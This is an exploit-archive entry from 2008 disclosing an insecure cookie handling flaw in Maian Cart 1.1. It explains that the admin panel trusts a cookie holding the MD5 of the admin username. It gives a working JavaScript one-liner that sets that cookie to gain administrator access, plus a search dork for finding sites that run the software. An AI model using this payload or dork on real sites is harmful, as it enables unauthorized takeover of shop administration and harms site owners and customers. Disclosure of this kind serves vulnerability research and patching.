[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Maian Cart 1.1 Insecure Cookie Handling Vulnerability
# Published : 2008-07-12
# Author : Saime
# Previous Title : Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
# Next Title : Maian Events 2.0 Insecure Cookie Handling Vulnerability
Author: Saime
Date: July 12, 2008
Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by Maian Cart v1.1
Description:
Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie,
equals admin username(md5)
Exploit:
javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
# www.Syue.com [2008-07-12]